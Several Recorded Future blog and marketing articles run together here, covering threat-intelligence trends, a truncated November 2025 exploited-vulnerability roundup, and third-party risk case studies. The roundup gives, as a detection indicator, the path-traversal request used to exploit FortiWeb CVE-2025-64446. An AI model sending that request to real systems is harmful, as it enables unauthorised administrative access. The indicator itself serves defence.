Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.

Real-Time Context from the Intelligence GraphⓇ

The Intelligence GraphⓇ addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:

• Open web
• Dark web marketplaces
• Malware repositories
• Technical feeds
• Network telemetry
• Closed underground forums

No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.

Comprehensive Digital Risk Protection for External Threats

Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.

Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.

Accelerating Time-to-Action through Integrated Intelligence

Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.

An extensive ecosystem of pre-built integrations and flexible APIs connect directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.

Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.

This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.

Smarter, Faster Security Decisions

Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.

By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.

These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.

Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how Recorded Future can support your Digital Threat Detection strategy.

The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.

The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s 2025 State of Threat Intelligence Report found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.

This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.

Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.

Key Trends Driving Threat Intelligence Evolution

There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.

• Vendor Consolidation for Unified Intelligence: Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.
• Deeper Integration into Security Workflows: Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.
• Automation and AI Augmentation: To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.
• Fusion of Internal and External Data: Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).

Challenges Holding Team Backs Today

Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.

• Integration Gaps: Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.
• Credibility and Trust Issues: Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.
• Signal-to-Noise Overload: With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.
• Lack of Context for Action: Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.

These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.

Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned

In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).

Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.

Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.

Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.

Implications for 2026 Security Budgets and Investments

As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.

One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.

Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.

Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.

That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.

Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.

Charting the Course to 2026

Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.

By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.

So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like Recorded Future’s Threat Intelligence Maturity Assessment provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.

With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.

What security teams need to know:

• Fortinet leads concerns: Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation
• LANDFALL spyware campaign: Threat actors weaponized Samsung's image processing flaw (CVE-2025-21042) for zero-click Android attacks
• Public exploits proliferate: Seven of ten vulnerabilities have public proof-of-concept code available
• OS Command Injection and Out-of-bounds Write were tied as the most common weakness types

Bottom line: The reduced volume shouldn't signal reduced vigilance. November's vulnerabilities demonstrate that threat actors favored quality over quantity in their exploitation campaigns.

Quick Reference: November 2025 Vulnerability Table

All 10 vulnerabilities below were actively exploited in November 2025.

Table 1: List of vulnerabilities that were actively exploited in November based on Recorded Future data (Source: Recorded Future)

Key Trends: November 2025

Vendors Most Affected

• Fortinet dominated with two critical FortiWeb vulnerabilities, both enabling remote exploitation
• Microsoft faced a kernel-level race condition affecting all modern Windows versions
• Samsung saw the weaponization of an image processing vulnerability for sophisticated mobile attacks
• Additional affected vendors: Gladinet, Google, Oracle, WatchGuard, CentOS, and Autonomy (OpenPLC)

Most Common Weakness Types

• CWE-78 – OS Command Injection (tied for first)
• CWE-787 – Out-of-bounds Write (tied for first)
• CWE-284 – Improper Access Control
• CWE-362 – Race Condition
• CWE-306 – Missing Authentication for Critical Function

Threat Actor Activity

LANDFALL Android spyware campaign marked November's most sophisticated operation:

• Exploited CVE-2025-21042 for zero-click remote code execution on Samsung devices
• Targeted Middle Eastern countries (Iraq, Iran, Turkey, Morocco) with commercial-grade spyware
• Deployed via weaponized DNG image files through WhatsApp
• Achieved persistent device compromise without user interaction
• Demonstrated advanced anti-analysis and SELinux bypass capabilities

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.

CVE-2025-64446 | Fortinet FortiWeb

Risk Score: 99 (Very Critical) | CISA KEV: Added November 14, 2025

Why this matters: Unauthenticated attackers can bypass authentication entirely and create administrative accounts. With 4,768 exposed FortiWeb instances globally, this represents a critical internet-facing risk.

Affected versions: FortiWeb 8.0.0-8.0.1, 7.6.0-7.6.4, 7.4.0-7.4.9, 7.2.0-7.2.11, 7.0.0-7.0.11

Immediate actions:

• Apply Fortinet's security updates (8.0.2, 7.6.5, 7.4.10, 7.2.12, or 7.0.12)
• Monitor for POST requests to /api/v2.0/cmd/system/admin%3F/../../../cgi-bin/fwbcgi
• Check for unauthorized admin accounts created since October 2025
• Review logs for Base64-encoded CGIINFO headers
• Disable HTTP/HTTPS on internet-facing interfaces if patching is delayed

Exposure: ~4,768 FortiWeb instances visible on Shodan (Netherlands, US, Germany, Italy, Peru)

Figure 1: Vulnerability Intelligence Card® for CVE-2025-64446 in Recorded Future (Source: Recorded Future)

• Static vendor checks fall short: Traditional, point-in-time third-party risk management practices (e.g. annual questionnaires) leave organizations blind to emerging vendor threats between audits. Continuous monitoring is now a must.
• Five common risk scenarios: Supply chain attacks, widespread software vulnerabilities, hidden fourth-party dependencies, vendor credential theft, and vendor instability each illustrate how “trusting” vendors can lead to breaches or business disruptions.
• Intelligence-driven defense: Recorded Future’s platform provides real-time visibility into your vendor ecosystem—from dark web credential leaks to fourth-party relationships—enabling proactive mitigation before incidents impact your organization.
• From trust to verification: The solution is to move from static trust to continuous verification. By continuously assessing vendors’ cyber and business health (and even integrating intelligence into workflows like ServiceNow), security leaders can vastly strengthen their vendor risk management framework.

Your Vendor Ecosystem Is a Black Box: It’s Time to Turn on the Lights

For CISOs and risk leaders, the attack surface now goes far beyond the footprint of the business. It’s a sprawling web of SaaS vendors, software suppliers, MSPs, payment processors, logistics partners, and niche fourth parties your vendors rely on. Every connection expands risk—often outside direct visibility. In other words, your security may only be as strong as your weakest vendor or partner.

Traditional third-party risk management (TPRM)—static security questionnaires and annual audits—cannot keep pace. They describe what a vendor claimed their security looked like months ago, not what it is right now. Meanwhile, the most damaging events (supply chain attacks, zero-day exploitation, credential resale, concentration failures) unfold in hours and days, not quarters.

This gap between point-in-time paperwork and real-time risk is why third-party exposure has become a primary vector for catastrophic breaches and business outages.

This article will highlight and analyze 5 real-world third-party risk examples. For each, we'll show why traditional methods fail and how continuous, real-time third-party risk management and threat intelligence is the only effective prevention.

5 Third-Party Risk Examples and How to Prevent Them

Modern vendor risk comes in many forms. Let’s explore five common scenarios—and how proactive measures can stop them:

Type 1: The Software Supply Chain Attack

The Scenario: One of the most damaging third-party risks is a software supply chain attack. This occurs when threat actors breach a trusted software vendor’s development environment and secretly inject malicious code into a legitimate, digitally signed software update. The tainted update, a “Trojan horse,” is then distributed to the vendor’s customers, giving the attacker access into thousands of networks at once.

Real-World Example: The SolarWinds Orion breach is a quintessential case. In 2020, nation-state hackers compromised SolarWinds’ build pipeline and inserted malware into an Orion software update. The malicious update, being validly signed, was pushed to around 18,000 customers, including numerous government agencies and Fortune 500 companies, who all gladly installed it, thereby granting the attackers insider access to their systems.

Why Traditional Methods Fail: A standard vendor security questionnaire or audit would never have caught this. SolarWinds had passed assessments and appeared reputable. The update itself was digitally signed and appeared “trusted” to antivirus scanners and other controls. In short, you cannot audit your way out of a risk that’s been inserted into a trusted product’s software supply chain.

The Intelligence-Led Solution: Preventing a supply chain attack means detecting subtle warning signs before the breach fully unfolds. Recorded Future’s platform continuously monitors for early indicators tied to your vendors. If threat actors known for targeting CI/CD pipelines start discussing or probing one of your software vendors, you’d know. If intelligence suggests a vendor’s code-signing certificate may be compromised, you’d get an alert. Armed with this foresight, you could elevate that vendor’s risk status, scrutinize their software updates more closely, and even hunt for indicators of compromise in your environment before the breach becomes public knowledge.

Type 2: The Widespread Third-Party Vulnerability

The Scenario: A critical software vulnerability (often a zero-day) is discovered in a common component that many of your vendors use. It could be an open-source library, a popular IT tool, or a cloud service. You have no direct visibility that your suppliers rely on this component. Attackers quickly develop an exploit and start compromising organizations at scale via this flaw, long before most victims even realize they’re exposed through their third parties.

Real-World Example: The MOVEit Transfer zero-day (exploited by the Cl0p ransomware group) and the Log4j “Log4Shell” vulnerability are perfect examples of this risk. In the case of MOVEit, a single bug in a widely used file-transfer product led to the mass theft of data from thousands of companies, many of whom weren’t even direct customers of MOVEit, but their vendors were. Similarly, the Log4j flaw impacted countless businesses indirectly because software used by their contractors and providers included the vulnerable library.

Why Traditional Methods Fail: This is fundamentally a technology visibility problem. A point-in-time survey asking your vendors “Do you use MOVEit?” is too little, too late. By the time you send out a questionnaire and get a reply (if you get one at all), attackers may have already exploited the vulnerability and exfiltrated data. No organization can manually track every piece of software in their extended vendor ecosystem through periodic check-ins. In the MOVEit incident, many companies had no idea they were at risk until news of data breaches surfaced. Traditional vendor risk management simply isn’t designed to monitor technical exposure in real time.

The Intelligence-Led Solution: Defending against widespread vulnerabilities requires connecting two dots instantly: what’s vulnerable and who in your supply chain is using it. This is where an intelligence platform shines. Recorded Future’s approach combines technical attack surface intelligence with real-time vulnerability tracking. It continuously scans the internet to map out the external-facing tech stack of your third parties. The moment a new critical vulnerability is disclosed, Recorded Future’s intelligence automatically checks which of your vendors are running that technology. You receive an immediate, prioritized alert such as: “CRITICAL: 15 of your third-party vendors are exposing servers running [the vulnerable software]. Prompt them to apply patches or mitigations immediately.”

Type 3: The Fourth-Party & Concentration Risk

The Scenario: Sometimes the biggest risk in your vendor ecosystem isn’t with your direct third parties, but with their key dependencies. A “fourth party” is a vendor of your vendor, and if one that many of your critical vendors rely on goes down, it can create a single point of failure. A single outage can cascade up the chain, disrupting operations even when direct vendors appear secure.

Real-World Example: The 2021 ransomware attack on Kaseya’s VSA remote monitoring and management platform is a textbook case. Kaseya primarily served managed service providers (MSPs), who in turn delivered IT services to thousands of downstream customers. When attackers exploited Kaseya VSA, they were effectively able to push ransomware out through those MSPs to many organizations that had no direct relationship with Kaseya at all—they only “knew” their MSP. A single fourth-party dependency became the pivot point for a broad, multi-industry disruption.

Why Traditional Methods Fail: If you looked at each of your primary (third-party) vendors in isolation, they all might have passed your security reviews with flying colors. What the traditional assessment missed was that ten of those vendors all relied on the same subcontractor for a critical function, a critical audit blind spot. Most organizations only discovered their exposure to Kaseya after MSP-delivered systems were already encrypted. Without continuous visibility into your vendors’ vendors, this kind of concentration risk remains invisible until it’s too late.

The Intelligence-Led Solution: The only way to manage fourth-party and concentration risk is through continuous mapping of your vendors’ vendors, coupled with dynamic risk scoring. Recorded Future’s Third-Party Intelligence solution automatically identifies and maps these Nth-party relationships throughout your supply chain. In practice, this means if a critical fourth-party suffers a breach, you won’t be finding out via the news days later. Instead, your intelligence dashboard would immediately show that entity’s risk score spiking from, say, a modest 50 to a critical 99. This timely insight gives you a head start to activate business continuity and incident response plans. You immediately know exactly which of your vendors are impacted and can work to contain the fallout.

Type 4: The Vendor Credential Compromise

The Scenario: Not all third-party attacks involve sophisticated malware or supply chain tampering. Sometimes hackers just log in through the front door. In this scenario, a threat actor steals valid credentials from one of your vendors and uses those to access your systems. Perhaps an employee at a smaller, “low-risk” vendor, like an HVAC contractor, falls victim to a phishing email or unknowingly runs info-stealer malware on their laptop. Their VPN login or application credentials to your network get quietly harvested and sold on the dark web. An attacker buys the login, bypasses your multi-factor authentication, and walks into your network posing as a legitimate third-party user.

Real-World Example: This tactic was at the heart of the high-profile 2023 breaches of MGM Resorts and Caesars Entertainment, where attackers initially gained access via a third-party IT support vendor’s compromised VPN credentials.

Why Traditional Methods Fail: A vendor security questionnaire cannot prevent an individual at a partner company from clicking a phishing link or using a weak password. Your vendor might have all the right policies on paper, but those policies are irrelevant the moment an attacker has a valid username and password in hand. Traditional TPRM programs are about vetting a vendor’s security controls and compliance, but they don’t provide real-time awareness of things like a password leak or dark web sale of access related to that vendor.

The Intelligence-Led Solution: The key to stopping a credential-based breach is catching those compromised credentials before they are used against you. This calls for continuous identity-centric intelligence. Recorded Future’s Third-Party Intelligence module includes automated monitoring of a wide range of sources, from dark web forums to infostealer logs and criminal marketplaces, specifically watching for any mention of your organization’s partners and their accounts. The moment a set of credentials associated with one of your vendors appears in an illicit context, you receive a high-priority alert. Your team can immediately revoke or reset that vendor account and investigate the extent of access. This is the definition of proactive defense: you’re effectively shutting the door on the attacker before they can walk through it.

Type 5: The Operational & Financial Instability Risk

The Scenario: Sometimes the greatest third-party risk is a vendor’s operational or financial collapse. Consider a scenario where a critical vendor suddenly encounters a non-cyber crisis like bankruptcy, a major lawsuit or regulatory sanction, a natural disaster, or even a geopolitical event that halts their business. From your security team’s perspective everything looked fine, but virtually overnight this partner’s failure threatens to grind your business to a halt.

Real-World Example: A headline-grabbing case occurred with the sudden collapse of Silicon Valley Bank (SVB) in March 2023. SVB wasn’t attacked by hackers; it suffered a bank run and shut down in a matter of days. Companies that used SVB as a banking partner or for credit found themselves unable to access funds or process payroll, creating a cascade of operational and financial issues.

Why Traditional Methods Fail: A standard security questionnaire or compliance-focused vendor review is utterly blind to this category of risk. Your CISO’s third-party risk process likely doesn’t include reviewing a vendor’s financial statements or monitoring news about their executives’ legal troubles—nor should it, in a traditional model, since those are outside the classic IT security scope. As a result, organizations were caught off-guard by SVB’s collapse. A vendor that looked perfectly green from a security control standpoint turned out to be a huge business continuity threat. This kind of event exposes an “edge case” risk that isn’t an edge case at all: vendors can introduce strategic and financial risks that security teams and vendor managers often aren’t tracking.

The Intelligence-Led Solution: Truly comprehensive third-party risk management means monitoring all-source intelligence on your vendors, not just cyber indicators. Recorded Future’s Third-Party Intelligence platform is built to ingest and analyze a broad spectrum of data about companies. This includes real-time monitoring of global news media, credit ratings and financial filings, changes in executive leadership, legal filings, sanctions lists, regulatory watchlists, and more. By defining “risk” holistically, the platform can alert you to significant non-cyber events that may impact your vendors. These signals give your security, risk, and procurement teams time to react, whether that means activating contingency plans, finding alternate suppliers, or engaging leadership to address the issue.

The Solution: Move from “Trust” to “Continuous Verification”

The five examples share a theme: “trust” is not a control. Vendor attestations and annual audits don’t capture rapidly changing third-party conditions—exploits, credentials, dependencies, and financial shocks. To answer why third-party risk management is important: it’s no longer a “vendor” problem. It’s your attack surface, your data, and your reputation on the line.

This is why security leaders are shifting from a trust-but-verify model to a model of continuous verification, replacing blind trust with live intelligence.

Moving to continuous verification means supplementing or replacing periodic vendor check-ins with real-time intelligence and automation. This is where Recorded Future’s approach comes in. Recorded Future acts as a “risk radar” that’s always on, giving you a 360-degree, real-time view of your third-party ecosystem. It uniquely integrates multiple intelligence streams—threat intelligence, attack surface intelligence, and third-party risk intelligence—into one platform.

• Know which CVEs matter today across your ecosystem with Vulnerability Intelligence and exploit-in-the-wild context.
• Detect compromised vendor access with Identity Intelligence and automated revocation workflows.
• Map fourth-party dependencies and track concentration with Third-Party Intelligence risk scoring.
• Operationalize all of this via integrations to SIEM/SOAR/EDR and GRC/TPRM workflows (e.g., ServiceNow) so that risk evidence triggers action.

Recorded Future is the only platform connecting disparate, live third-party intelligence into a single, real-time view that answers the question:

“Which of my vendors poses the greatest risk to my business—right now?”

Ready to replace point-in-time vendor questionnaires with continuous verification? Schedule a personalized demo, and our experts will show you how the Recorded Future platform provides a complete, real-time picture of your vendor ecosystem.